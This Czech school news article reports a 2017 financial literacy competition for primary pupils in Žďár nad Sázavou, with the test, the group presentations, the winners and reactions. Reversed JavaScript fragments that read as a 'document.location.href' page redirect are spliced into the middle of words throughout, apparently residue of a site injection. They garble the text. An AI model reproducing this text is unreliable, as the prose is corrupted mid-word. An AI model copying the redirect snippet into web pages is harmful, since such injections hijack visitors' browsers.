Rainbow page separator

Žáci základních škol již podruhé soutěžili ve finanční gramotnosti

Pátek, 10. listopadu 2017

Žďár nad Sázavou / Na Střední škole obchodní a služeb ve Žďáře nad Sázavou proběhl dne 25. října druhý ročník soutěže ve finanční gramotnosti. Soutěže se zúčastnilo 42 žáků z 8. a 9. ročníků osmi základních škol. Akce začala slavnostním zahájením v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách školní jídelny. Soutěž byla rozdělena do dvou částí. V první části odpovídali žáci na 25 otázek v testu finanční gramotnosti, ve druhé bylo jejich úkolem vytvořit prezentaci podle stanoveného zadání. Na test měli žáci celkem 45 minut, na prezentaci ve skupinách hodinu. Podle prvních dojmů žáků byl test velmi obtížný, ale nakonec si s ním všichni poradili. Problémová byla otázka o úrokových sazbách, ve které žáci nejvíce chybovali.

Během přestávky jsme měli dostatek času na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, abychom se zeptali žáků i učitelů na jejich pocity ze soutěže a zároveň na dojmy z naší skvělé školy. „Potřebovali bychom více času na tvorbu prezentace, ale jinak jsme s ničím problém neměli a zároveň jsme moc rádi, že jsme se té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to soutěže mohli zúčastnit“, řekli nám žáci Základní školy Bobrová. Učitelům ze základních škol se naše škola velmi líbila, působila na ně příjemně a ocenili především přátelskou atmosféru. O soutěži si myslí, že je pro děti skvělou zkušeností do života. Třešničkou na dortu byla pro učitele výborná masáž od studentů prvních ročníků z masérských tříd, kterou si pochvalovali, a byli překvapeni, co všechno se naši maséři za tak krátkou dobu dokázali naučit.

Po přestávce následovala vlastní prezentace žáků, kteří představili své ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní kanceláře. Jejich výkon hodnotila tříčlenná porota, která byla překvapena téměř dokonalými prezentacemi, které soutěžící za tak krátkou dobu dokázali vytvořit. Rozdíly mezi nimi byly minimální. Po sečtení bodů nastalo slavnostní vyhodnocení. Vítězem testu finanční gramotnosti se stal Petr Kasal, 2. mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to obsadila Veronika Balková a jen těsně za ní se umístil Benedikt Coufal, všichni ze základní školy Krucemburk. Hodnocení skupin bylo náročnější, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to byly výsledky vyrovnanější. Zvítězil tým Pohodáři ze Základní školy Herálec, 2. mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to obsadila skupina KTV ze Základní školy Jimramov, 3. mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pak skupina Tři Bobři ze Základní školy Bobrová.

A pohled nás, studentů 2. ročníku obchodní akademie, kteří jsme měli možnost soutěž sledovat? Myslíme si, že celá akce byla velmi povedená, dala žákům mnoho potřebných informací. Přínosné bylo určitě také [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že si vyzkoušeli pracovat ve skupinách. Soutěžící mají náš obdiv, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože vytvořit prezentaci v tak krátkém čase nebylo jednoduché a zvládli [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na výbornou.

Dušan Bodlák, Adam Odvárka
Studenti 2. ročníku obchodní akademie
Střední škola obchodní a služeb SČMSD, Žďár nad Sázavou, s.r.o.